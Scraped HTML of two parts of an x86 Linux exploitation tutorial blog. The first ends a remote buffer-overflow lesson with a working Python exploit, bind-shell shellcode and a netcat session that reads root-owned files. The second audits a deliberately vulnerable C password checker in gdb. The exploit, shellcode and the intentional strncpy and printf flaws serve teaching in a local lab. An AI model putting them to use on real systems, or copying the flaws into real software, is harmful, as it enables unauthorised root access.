class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;Aquot;/span span class="o"*/span span class="mi"532/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xd0\x8c\x04\x08/spanspan class="s2"quot;/span span class="c1"# the address of our 0xff 0xe4/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"20/span span class="c1"# nop sled/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThe only changes here are, before we overwrite the return address we only send codeA/code's (532 of them, 528 for the local variables and 4 for the saved EBP), then we put our return address (the address of codejmp esp/code strong08048cd0/strong) and lastly we stick our a href="https://en.wikipedia.org/wiki/NOP_slide" target="_blank"NOP sled/a and shellcode (the NOP sled isn't actually needed though as we know ESP will point to the start of our code)./p pWe can now exploit the application, first run the app again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pNow launch the exploit and connect to our shell:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-exploit2.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"pwd/span/span span class="code-line"span class="go"/home/appuser/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 32/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rwxr-xr-x 1 appuser appuser 486 Jul 8 11:16 jesp/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 32 Jul 8 11:08 jesp.nasm/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 432 Jul 8 11:16 jesp.o/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="go"cat token/span/span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!! :-)/p h2Conclusion/h2 pWhile ASLR makes it more difficult to exploit a vulnerability, it doesn't make it impossible. You do, however, need to understand how the stack works more than if ASLR is disabled./p pAlso, if you need to use instructions from inside the application code, you aren't restricted to the normal instructions executed by the application at runtime. You can jump into the middle of an instruction to create an entirely new instruction to run./p pThis idea of using bits of instructions (or gadgets) is the beginning of a href="https://en.wikipedia.org/wiki/Return-oriented_programming" target="_blank"return-oriented programming ROP/a, which we will use more extensively later./p pHappy Hacking :-)/p

eXploit
Basic Binary Auditing0xe7
1 July 2014 at 10:32

Basic Binary Auditing

eXploit

By: 0xe7

1 July 2014 at 10:32

pBefore I go into some of the protections that are commonly in place, I thought it would be best to show how to detect these 2 basic vulnerabilities using a href="https://en.wikipedia.org/wiki/Reverse_engineering" target="_blank"reverse engineering/a (as opposed to randomly a href="https://en.wikipedia.org/wiki/Fuzz_testing" target="_blank"fuzzing/a inputs as we did in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a and a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a)./p pReverse engineering (reversing) is an extremely powerful tool in the hackers arsenal and when there is no source code for the application that you are targeting nothing is better./p !-- more -- pa href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"Assembly/a is the language of reversing and a a href="https://en.wikipedia.org/wiki/Debugger" target="_blank"debugger/a is the most important tool./p pAssembly is essentially the language of the processor, the actual "machine code" that people think of what the computer deals with (whether viewed as binary or hex) is just a different representation of assembly language, so this is the lowest level programming language possible to those outside of processor firmware development./p pA debugger is an application that allows you to view an applications a href="https://en.wikipedia.org/wiki/Virtual_memory" target="_blank"virtual memory segment/a as the application itself views it, as well as change the values in sections of memory or a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a at run time./p pAnother important feature of a debugger is the ability to set a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoints/a so you can force the application to stop execution at a specific part of the application and view values or a href="https://en.wikipedia.org/wiki/Stepping_%28debugging%29" target="_blank"step through/a the application instruction by instruction./p h2The App/h2 pWe will use the same basic application we used in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis time we will not exploit this application (we've done that already), instead we'll just use the debugger it figure out that these vulnerabilities exist./p h2Setting Up The Environment/h2 pThis is the same as in part a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a so please refer to the strongSetting Up The Environment/strong section of 1 of those./p h2Looking For The Juicy Bits/h2 pFirst we'll test the application as usual:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"testuser@dev:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pNothing unusual there but we now know that the application takes 1 argument. If we open this using codegdb/code we can have a closer look at it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x0804842e _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 strcmp@plt/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 printf@plt/span/span span class="code-line"span class="go"0x08048480 fclose/span/span span class="code-line"span class="go"0x08048480 fclose@plt/span/span span class="code-line"span class="go"0x08048490 _IO_getc/span/span span class="code-line"span class="go"0x08048490 _IO_getc@plt/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 puts@plt/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__@plt/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 exit@plt/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 strlen@plt/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main@plt/span/span span class="code-line"span class="go"0x080484f0 fopen/span/span span class="code-line"span class="go"0x080484f0 fopen@plt/span/span span class="code-line"span class="go"0x08048500 putchar/span/span span class="code-line"span class="go"0x08048500 putchar@plt/span/span span class="code-line"span class="go"0x08048510 strncpy/span/span span class="code-line"span class="go"0x08048510 strncpy@plt/span/span span class="code-line"span class="go"0x08048520 _start/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860c main/span/span span class="code-line"span class="go"0x080486a2 checkpass/span/span span class="code-line"span class="go"0x080486f0 printfile/span/span span class="code-line"span class="go"0x08048760 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048770 __libc_csu_init/span/span span class="code-line"span class="go"0x080487ca __i686.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x080487d0 _fini/span/span span class="code-line"/code/pre/div /td/tr/table pHere we can tell that the application was written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a because it includes code__libc_start_main/code on lines 25 and 26. This means we have a codemain/code function which is the start of our application (shown on line 38)./p pThere are a couple of other functions of interest here but let's leave them for a bit and look at the codemain/code function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;putchar@pltgt;/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThe first 4 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue" target="_blank"function prologue/a (lines 3, 4, 5 and 6). Here the a href="http://en.citizendium.org/wiki/Stack_frame" target="_blank"stack frame/a is set up./p pThe last 2 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue#Epilogue" target="_blank"function epilogue/a (lines 39 and 40). Here the codeleave/code instruction preforms the inverse of what the prologue did./p pLooking at the prologue and epilogue we can see that the a href="https://en.wikipedia.org/wiki/Calling_convention" target="_blank"calling convention/a is probably a href="https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl" target="_blank"cdecl/a./p pI will not go into calling conventions much here, because it isn't terribly relevant although its important to know what they are and the differences, but a calling convention basically defines how a function is called./p pBack on topic, initially when looking for a vulnerability we should check some of the known vulnerable functions commonly used by developers. The main 1's are the codeprintf/code family of functions and the string copying/moving functions./p pLooking back at our list of functions, a couple of interest are being used. Mainly codeprintf/code and codestrncpy/code. In the main function though only codeprintf/code out of those 2 is being used. Let's examine them a little closer./p 